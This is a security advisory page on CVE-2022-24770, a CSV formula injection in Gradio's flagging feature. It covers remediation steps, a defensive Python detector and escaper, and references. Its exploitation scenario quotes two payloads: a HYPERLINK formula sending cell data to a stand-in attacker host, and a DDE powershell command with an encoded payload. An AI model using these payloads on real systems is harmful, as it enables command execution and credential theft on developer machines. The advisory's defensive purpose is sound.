CVE-2022-24770: Gradio: CSV formula injection via flagging enables RCE
Severity: HIGH. Proof-of-concept exploit: available.

Any Gradio-based ML demo with flagging enabled allows end users to inject spreadsheet formulas into developer-side CSV logs. When a developer opens that CSV in Excel or similar tools, arbitrary commands execute on their machine — a classic developer-chain attack that pivots from a public ML interface to an internal workstation. Patch to 2.8.11 immediately; if unpatched, disable flagging or configure CSV consumers to never open these files in spreadsheet software.
Risk Assessment
High risk for organizations running Gradio-powered demos or internal tools with flagging enabled. The attack requires no authentication, no AI/ML knowledge, and only basic formula injection skills — trivially accessible to any user of the demo. The impact lands on developer machines, not end users, making it a targeted developer-chain threat. Exposure is broad given Gradio's widespread adoption in ML prototyping and Hugging Face Spaces.
Affected Systems
| Package | Ecosystem | Vulnerable Range | Patched |
|---|---|---|---|
| gradio | pip | < 2.8.11 | 2.8.11 |
Recommended Action
1. Patch: Upgrade Gradio to 2.8.11 or later (single-quote escaping is applied to CSV outputs).
2. Workaround if patching is delayed: disable the flagging feature in Gradio configuration or restrict who can trigger flags.
3. Process control: instruct all team members to never open Gradio-generated CSVs directly in Excel; use Python/pandas for review instead.
4. Detection: search flagged CSV files for cells starting with =, +, -, or @ characters (formula injection markers).
5. Audit: review flagged CSV files already on disk for injected formulas before opening.
CISA SSVC Assessment
Source: CISA Vulnrichment (SSVC v2.0). Decision based on the CISA Coordinator decision tree.
Frequently Asked Questions
Is CVE-2022-24770 actively exploited?
Proof-of-concept exploit code is publicly available for CVE-2022-24770, increasing the risk of exploitation.
What systems are affected by CVE-2022-24770?
This vulnerability affects the following AI/ML architecture patterns: ML demo platforms, model evaluation pipelines, data labeling and flagging workflows, model serving.
What is the CVSS score for CVE-2022-24770?
CVE-2022-24770 has a CVSS v3.1 base score of 8.8 (HIGH). The EPSS exploitation probability is 0.59%.
Technical Details
NVD Description
`gradio` is an open source framework for building interactive machine learning models and demos. Prior to version 2.8.11, `gradio` suffers from Improper Neutralization of Formula Elements in a CSV File. The `gradio` library has a flagging functionality which saves input/output data into a CSV file on the developer's computer. This can allow a user to save arbitrary text into the CSV file, such as commands. If a program like MS Excel opens such a file, then it automatically runs these commands, which could lead to arbitrary commands running on the user's computer. The problem has been patched as of `2.8.11`, which escapes the saved csv with single quotes. As a workaround, avoid opening csv files generated by `gradio` with Excel or similar spreadsheet programs.
Exploitation Scenario
An adversary discovers a public-facing Gradio-based ML demo (e.g., a text classification or image captioning tool). They submit a crafted input containing a CSV formula payload such as `=HYPERLINK("http://attacker.com/"&C1,"Click")` or `=cmd|'/c powershell -nop -w hidden -enc <base64payload>'!A0` as the model input. Gradio's flagging mechanism saves this input verbatim to a CSV log on the developer's machine. When the developer reviews flagged samples in Excel to identify model weaknesses, the formula executes — delivering a reverse shell or exfiltrating environment variables and credentials from the developer workstation, providing a pivot point into the organization's internal infrastructure.
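The detection and audit steps from the recommended actions, together with the write-time single-quote escaping the fix is described as applying, as an added Python example (not Gradio's own code): it scans a flagging CSV for formula-style cells and shows one row being neutralised before it is written. The prefix list extends the advisory's four characters with tab and carriage return, which OWASP's CSV-injection guidance also lists; the sample log is constructed.

```python
import csv
import io

# Leading characters a spreadsheet interprets as the start of a formula. The
# advisory names =, +, -, @; tab and carriage return are added here because
# some spreadsheet importers strip them before evaluating the cell.
FORMULA_PREFIXES = ("=", "+", "-", "@", "\t", "\r")


def is_suspicious(value):
    """Detection rule from the advisory: a string cell starting with a formula prefix."""
    return isinstance(value, str) and value.startswith(FORMULA_PREFIXES)


def escape_cell(value):
    """Neutralise a cell the way the 2.8.11 fix is described: prefix a leading
    formula character with a single quote so the spreadsheet treats it as text."""
    return "'" + value if is_suspicious(value) else value


def scan_csv_text(text):
    """Audit an existing flagging CSV given as text. Returns a list of
    (row_index, column_index, cell) for every suspicious cell; row 0 is the header.
    Hyphen-led free text (e.g. '-5 stars') is reported too, so review hits by hand."""
    findings = []
    for row_idx, row in enumerate(csv.reader(io.StringIO(text))):
        for col_idx, cell in enumerate(row):
            if is_suspicious(cell):
                findings.append((row_idx, col_idx, cell))
    return findings


def write_flag_row(inputs, outputs):
    """Serialise one flagged sample with every cell escaped at write time, which is
    where the fix belongs: the log is then safe regardless of which tool opens it."""
    buf = io.StringIO()
    csv.writer(buf, lineterminator="\n").writerow(
        [escape_cell(v) for v in (*inputs, *outputs)]
    )
    return buf.getvalue()


# Constructed sample flagging log (input, output, flag, timestamp): the first data
# row carries a formula-style input, the last a harmless hyphen-led review.
SAMPLE_LOG = (
    "input,output,flag,timestamp\n"
    '"=HYPERLINK(""http://example.invalid/""&C1,""Click"")",positive,,2022-03-01\n'
    "a normal review,negative,,2022-03-01\n"
    "-5 stars would not recommend,negative,,2022-03-01\n"
)
```

Running `scan_csv_text(SAMPLE_LOG)` reports rows 1 and 3 (the hyphen-led review is a false positive of the prefix rule, which is why the audit step ends in manual review), while rows produced by `write_flag_row` come back clean.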
Weaknesses (CWE)
Improper Neutralization of Formula Elements in a CSV File (as named in the NVD description).
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
References
- github.com/gradio-app/gradio/commit/80fea89117358ee105973453fdc402398ae20239 (Patch, 3rd Party)
- github.com/gradio-app/gradio/pull/817 (Patch, 3rd Party)
- github.com/gradio-app/gradio/security/advisories/GHSA-f8xq-q7px-wg8c (3rd Party)
- github.com/ARPSyndicate/cvemon (Exploit)
- github.com/karimhabush/cyberowl (Exploit)
Related Vulnerabilities (same package: gradio)
- CVE-2023-25823 (9.8): Gradio: hardcoded SSH key leaks via share=True demos
- CVE-2024-47167 (9.8): Gradio: unauthenticated SSRF in /queue/join, internal pivot
- CVE-2024-39236 (9.8): Gradio: code injection via component metadata
- CVE-2024-0964 (9.4): Gradio: unauthenticated LFI exposes full server filesystem
- CVE-2024-4253 (9.1): Gradio: CI/CD command injection enables secrets exfiltration